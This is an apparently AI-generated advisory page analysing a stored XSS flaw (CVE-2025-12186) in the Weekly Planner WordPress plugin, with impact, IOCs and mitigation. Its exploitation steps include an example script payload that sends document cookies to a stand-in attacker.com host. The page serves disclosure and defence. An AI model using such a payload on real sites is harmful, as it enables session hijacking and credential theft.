CVE-2025-12186
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-12186 is a Stored Cross-Site Scripting (XSS) vulnerability in the Weekly Planner plugin for WordPress, affecting all versions up to and including 1.0. The flaw stems from insufficient input sanitization and output escaping in the plugin's admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts into pages. The vulnerability was published on December 5, 2025, and was assigned by Wordfence. It carries a CVSS v3.1 base score of 4.4 (Medium) and is limited in scope to multi-site WordPress installations or those where unfiltered_html has been disabled (Wordfence, Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), arising from the plugin's failure to properly sanitize administrator-supplied input in settings fields and to escape output when rendering those values on pages. An authenticated attacker with administrator privileges can submit malicious JavaScript payloads through the plugin's admin settings interface; these payloads are then stored in the database and executed in the browser of any user who visits an affected page. Exploitation requires high privileges (administrator-level) and is constrained to multi-site WordPress environments or single-site installations where unfiltered_html capability has been explicitly disabled (Wordfence, Red Hat CVE).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers when they visit pages rendered with the injected content, potentially leading to session hijacking, credential theft, phishing, or unauthorized actions performed on behalf of victims. The CVSS scope is rated as "Changed," meaning the impact can extend beyond the vulnerable component to affect other users or systems. Confidentiality and integrity impacts are rated Low, and there is no direct availability impact; however, in a multi-site environment, the blast radius could extend across multiple sites sharing the same WordPress installation (Wordfence, Red Hat CVE).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-12186. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is further constrained by the requirement for administrator-level authentication and specific WordPress configuration conditions (multi-site or disabled unfiltered_html) (Wordfence).

Exploitation steps

  1. Gain Administrator Access: Obtain or compromise an administrator-level account on a vulnerable WordPress multi-site installation or one where unfiltered_html is disabled, running Weekly Planner plugin version ≤ 1.0.
  2. Navigate to Plugin Settings: Log in to the WordPress admin dashboard and navigate to the Weekly Planner plugin's settings page.
  3. Inject Malicious Payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.
  4. Save Settings: Submit the form to store the malicious payload in the WordPress database.
  5. Trigger Execution: When any user (including other administrators or site visitors) accesses a page that renders the injected setting value, the malicious script executes in their browser, potentially stealing session cookies or performing actions on their behalf (Wordfence).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected changes to Weekly Planner plugin settings by administrator accounts; access logs with POST requests to plugin settings pages containing script tags or encoded JavaScript.
  • Database: Presence of <script>, javascript:, or encoded XSS payloads (e.g., %3Cscript%3E) in WordPress database entries associated with the Weekly Planner plugin options table (wp_options).
  • Network: Outbound requests from user browsers to unknown external domains shortly after visiting pages that render Weekly Planner plugin content, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected for this stored XSS; however, review plugin configuration files for unexpected modifications.

Mitigation and workarounds

The primary remediation is to update the Weekly Planner plugin to a version beyond 1.0 if a patched release becomes available; administrators should monitor the WordPress plugin repository for updates. As an interim workaround, restrict administrator access to trusted users only and audit existing plugin settings for injected content. Site operators should also consider enabling unfiltered_html restrictions only where necessary, as this vulnerability is limited to environments where it is disabled or multi-site setups. If the plugin is not actively needed, deactivating and removing it eliminates the attack surface entirely (Wordfence, WordPress Plugin).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18044NONEN/A
  • estatik
NoYesAug 12, 2026
CVE-2026-17008NONEN/A
  • quick-paypal-payments
NoNoAug 12, 2026
CVE-2026-16990NONEN/A
  • wp-paypal
NoNoAug 12, 2026
CVE-2026-16747NONEN/A
  • kirki
NoYesAug 12, 2026
CVE-2026-16621NONEN/A
  • woo-paypal-gateway
NoYesAug 12, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management